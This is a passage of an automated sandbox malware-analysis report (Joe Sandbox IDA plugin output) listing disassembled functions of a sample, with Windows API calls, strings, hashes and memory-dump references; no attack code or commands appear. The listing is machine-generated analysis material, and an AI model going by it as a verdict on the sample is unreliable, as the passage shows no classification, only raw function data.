                                                    • Instruction ID: bffb481bb724897bb9c8e7d8e8ebbbabfb2e91469b04f9b37fc89d0cc1c6c1b9
                                                    • Opcode Fuzzy Hash: 51520fbb3bc9b7593171b1527b5568d8c633cb364bfdf6f09dcf5071573fc065
                                                    • Instruction Fuzzy Hash: 04419C30504700DFC326DF29C980A6BF7EABF96704F518A1DF08996521EB35E988CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A4010 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: FTP Server$GET$HTTP/1.0$Local Network Server$[mT$emT$qpT
                                                    • API String ID: 1452528299-196570190
                                                    • Opcode ID: 2a20fb948c6240a50193171d36578b251c1ddcee8dbecea5a64e8f3e649be80f
                                                    • Instruction ID: ff5dbabc757a376e158a4e1672e592aa6b34b3bc40f23c28f389f0fbee757ea2
                                                    • Opcode Fuzzy Hash: 2a20fb948c6240a50193171d36578b251c1ddcee8dbecea5a64e8f3e649be80f
                                                    • Instruction Fuzzy Hash: 6741FD719006059BDB10DFA4DC49BAFBBF8FF96310F10462AE910EB2D1DB7499048BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F8B1 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8D5
                                                    • HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8DC
                                                      • Part of subcall function 0051F9A7: IsProcessorFeaturePresent.KERNEL32(0000000C,0051F8C3,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9A9
                                                    • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8EC
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F913
                                                    • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F927
                                                    • InterlockedPopEntrySList.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F93A
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F94D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                    • String ID:
                                                    • API String ID: 2460949444-0
                                                    • Opcode ID: 8e104be7c2ceffc736a1df34f8790c7aa60b1f69d6ab16eb770184c64bde8cf9
                                                    • Instruction ID: b39e7be4907c70a771e3251d322211f62b1b898311148e55915ef27d35f6247d
                                                    • Opcode Fuzzy Hash: 8e104be7c2ceffc736a1df34f8790c7aa60b1f69d6ab16eb770184c64bde8cf9
                                                    • Instruction Fuzzy Hash: F411B275A05A15BBF7223B78AC48FBA7A59FF55784F100531FA41E6260DB20CC84A7B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E520 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 342COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0041E7C5
                                                    • __Init_thread_footer.LIBCMT ref: 0041E891
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: AI_FRAME_NO_CAPTION_$Dialog$Pu[$`Dialog` = '
                                                    • API String ID: 1385522511-1151790693
                                                    • Opcode ID: bf864c46e6f432b95dcfb1fdeab75e9210c104aea617f9223004413a4f86bef1
                                                    • Instruction ID: 68ba9ea09dccf60d963622e0fbeea1df0369679566e8bdee9feee7f0fadaab07
                                                    • Opcode Fuzzy Hash: bf864c46e6f432b95dcfb1fdeab75e9210c104aea617f9223004413a4f86bef1
                                                    • Instruction Fuzzy Hash: 2DD1DE71E01205DFCB14CF78D985B9EBBB6FF98310F14822AE815AB2D1D774A944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036D310 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 285registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,D13B3340), ref: 0036D3B1
                                                    • GetLastError.KERNEL32 ref: 0036D3DA
                                                    • RegCloseKey.ADVAPI32(?,005B329C,00000000,005B329C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 0036D64E
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,00000000,0054C7CD,000000FF,?,005B329C,00000000,005B329C,00000000,?,80000001,00000001,00000000), ref: 0036D6DE
                                                    Strings
                                                    • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 0036D412
                                                    • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 0036D3A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$CreateErrorEventHandleLast
                                                    • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                    • API String ID: 1253123496-2079760225
                                                    • Opcode ID: 7f2c65b4b843247423b2aa6b4d57b9db8cb55b815fd542dd2fb6fb3a3cc278da
                                                    • Instruction ID: 564ff183edbed9009dda5664fee9f295ffacfd5dfbf9595d7a304b4f8c2e988d
                                                    • Opcode Fuzzy Hash: 7f2c65b4b843247423b2aa6b4d57b9db8cb55b815fd542dd2fb6fb3a3cc278da
                                                    • Instruction Fuzzy Hash: 83C1BE70E00348DFDB15CF68C948BAEBBB5FF55304F24825DE459A7281DB74AA88CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00365390 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 269memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 0036545A
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003654A6
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003654C8
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: String$Free$Alloc
                                                    • String ID: >R6$>R6
                                                    • API String ID: 986138563-1283833623
                                                    • Opcode ID: 4c982cc5adfb480842685043261def76503ce7d0ecce9e25176c1875d502a273
                                                    • Instruction ID: a45a45e293001997ff0a4540bf83bfef1b74afe0bdcc9d6a622e1456b1beadff
                                                    • Opcode Fuzzy Hash: 4c982cc5adfb480842685043261def76503ce7d0ecce9e25176c1875d502a273
                                                    • Instruction Fuzzy Hash: 5CA1C470A00609DFDB16CFA9CC48FAEBBB9FF45714F108269E516E7284DB749A01CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00360720 Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00360814
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00360889
                                                    • GetProcessHeap.KERNEL32(?,?), ref: 003608F9
                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 003608FF
                                                    • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,D13B3340,005CADDC,00000000), ref: 0036092C
                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,D13B3340,005CADDC,00000000), ref: 00360932
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0036094A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Free$Heap$String$Process
                                                    • String ID:
                                                    • API String ID: 2680101141-0
                                                    • Opcode ID: 0e7bf47b821814b8f761e2e261d8fe375174bc60bd9c55882e8d94a69fec627a
                                                    • Instruction ID: 49b8876e161ec571d62e200f3165dab9306b275fc2ebf14d8036379ebbe2f47f
                                                    • Opcode Fuzzy Hash: 0e7bf47b821814b8f761e2e261d8fe375174bc60bd9c55882e8d94a69fec627a
                                                    • Instruction Fuzzy Hash: 2D818D70D0021ADFEF16DFA8C845BEFBBB4BF05314F158558E810AB295D778AA04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046C5D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,005848ED,000000FF,?,0046C8E6,?), ref: 0046C673
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • RemoveDirectoryW.KERNEL32(?,D13B3340,?,?,?,?,005848ED,000000FF,?,0046C8E6,?,00000000), ref: 0046C6A2
                                                    • GetLastError.KERNEL32(?,D13B3340,?,?,?,?,005848ED,000000FF,?,0046C8E6,?,00000000), ref: 0046C6B2
                                                    • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?), ref: 0046C783
                                                    • GetLastError.KERNEL32(?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?,?,?,?,005848ED,000000FF), ref: 0046C7C2
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorInit_thread_footerLastRemove$DeleteFileFindHeapProcessResource
                                                    • String ID: \\?\
                                                    • API String ID: 34920479-4282027825
                                                    • Opcode ID: 60e19bb1d6111c2b438b4965e0c9467be23bdb4955c334d65a502264e2fd6d18
                                                    • Instruction ID: 893155cbd0d72054736dd2e26a2bddeb7c6e7a12171d3b38543529a556ff7fa5
                                                    • Opcode Fuzzy Hash: 60e19bb1d6111c2b438b4965e0c9467be23bdb4955c334d65a502264e2fd6d18
                                                    • Instruction Fuzzy Hash: E051C471900A059FD710DFA8C848BBAB7F4FF05321F10465AE9A1DB390EB799D049F99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00476E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476E9B
                                                    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00476EB1
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00476EEA
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476F06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$AddressLoadProc
                                                    • String ID: DllGetVersion$Shlwapi.dll
                                                    • API String ID: 1386263645-2240825258
                                                    • Opcode ID: 745d4a72387393e4cec553ac2a6309d7137e0ae8f6e1fb5c69f4c315b23dde79
                                                    • Instruction ID: 051ef6ca2d5eaca6196df984165ed2276a50dc113ca1b1183c5ecaf631ada958
                                                    • Opcode Fuzzy Hash: 745d4a72387393e4cec553ac2a6309d7137e0ae8f6e1fb5c69f4c315b23dde79
                                                    • Instruction Fuzzy Hash: A821D4766047058BD300AF2AE8456BBB7E5BFED710F810A2EF449C3201EB35D84887A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044B9E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044BEF0: __Init_thread_footer.LIBCMT ref: 0044BF80
                                                      • Part of subcall function 0044BEF0: GetProcAddress.KERNEL32(SetWindowTheme), ref: 0044BFBD
                                                      • Part of subcall function 0044BEF0: __Init_thread_footer.LIBCMT ref: 0044BFD4
                                                      • Part of subcall function 0044BEF0: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0044BFFF
                                                    • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BA32
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0044BA50
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0044BA58
                                                      • Part of subcall function 003672B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 003672E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
                                                    • String ID: Ao7$SysListView32$Kc
                                                    • API String ID: 605634508-804757280
                                                    • Opcode ID: 3040bf31acc834ff4ae78930d1a6bfd178c7ce59e2dd50fe029084693d3b1d78
                                                    • Instruction ID: ebf775872fa25015df0b8288d8f91a1591385522e4001f98b6159909676cda69
                                                    • Opcode Fuzzy Hash: 3040bf31acc834ff4ae78930d1a6bfd178c7ce59e2dd50fe029084693d3b1d78
                                                    • Instruction Fuzzy Hash: 15115A71304250BBE6259F168C05F5BFBAAFFC5750F154619FA04AB2A1C7B1A900CAE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051D1CE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0051D249,0051D1AC,0051D44D), ref: 0051D1E5
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0051D1FB
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0051D210
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: 6b71de4b37fc4321adbafd7866e1692b4edc9680de8d2ab8b6fbdf41023afbb1
                                                    • Instruction ID: 9695e0a8712c1e3cf17b3403ae049f37ec852ba409cf0569de569447dcdfc4d5
                                                    • Opcode Fuzzy Hash: 6b71de4b37fc4321adbafd7866e1692b4edc9680de8d2ab8b6fbdf41023afbb1
                                                    • Instruction Fuzzy Hash: E7F0A476B81212AB6B215F645C98ABA7FE87A1B3513140539ED71D2240DE34CCC8D6B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0052B5F9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D13B3340,?,?,00000000,005A5D89,000000FF,?,0052B589,?,?,0052B55D,?), ref: 0052B62E
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0052B640
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,005A5D89,000000FF,?,0052B589,?,?,0052B55D,?), ref: 0052B662
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$`{5$mscoree.dll
                                                    • API String ID: 4061214504-2791440910
                                                    • Opcode ID: 5134470176e7afb713da60a6f4f73794b45baa22f8a30c340b38ed507681c166
                                                    • Instruction ID: 3e7061836f9a297b9c7aad8d8aaeecdc1263cfa41e0b207ee2b09699f6a3c4e0
                                                    • Opcode Fuzzy Hash: 5134470176e7afb713da60a6f4f73794b45baa22f8a30c340b38ed507681c166
                                                    • Instruction Fuzzy Hash: 3E016235940625EFDB119B51DC09FBEBFB8FF05B11F000626F911A22E0DB74A904CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00386970 Relevance: 9.2, APIs: 6, Instructions: 178windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 003869D7
                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 003869FF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00386A17
                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00386A48
                                                    • GetParent.USER32(?), ref: 00386B24
                                                    • SendMessageW.USER32(00000000,00000136,?,?), ref: 00386B35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Parent
                                                    • String ID:
                                                    • API String ID: 1020955656-0
                                                    • Opcode ID: 37d195850a36538d3b008e6867072cd58450668476681f60cffb597998213461
                                                    • Instruction ID: 0fe50f21769a1fb744bd429744d4cbcbfc5b33e387008694c457c4cb0148ff7f
                                                    • Opcode Fuzzy Hash: 37d195850a36538d3b008e6867072cd58450668476681f60cffb597998213461
                                                    • Instruction Fuzzy Hash: 4E613EB1904218AFDB219FE4DD49FAEBBB9FF48711F104159F605AB2A0CB756A01CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00521AE3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00521ADA,00521AA6,?,?,0038B0CD,0046B340,?,00000008), ref: 00521AF1
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00521AFF
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00521B18
                                                    • SetLastError.KERNEL32(00000000,00521ADA,00521AA6,?,?,0038B0CD,0046B340,?,00000008), ref: 00521B6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
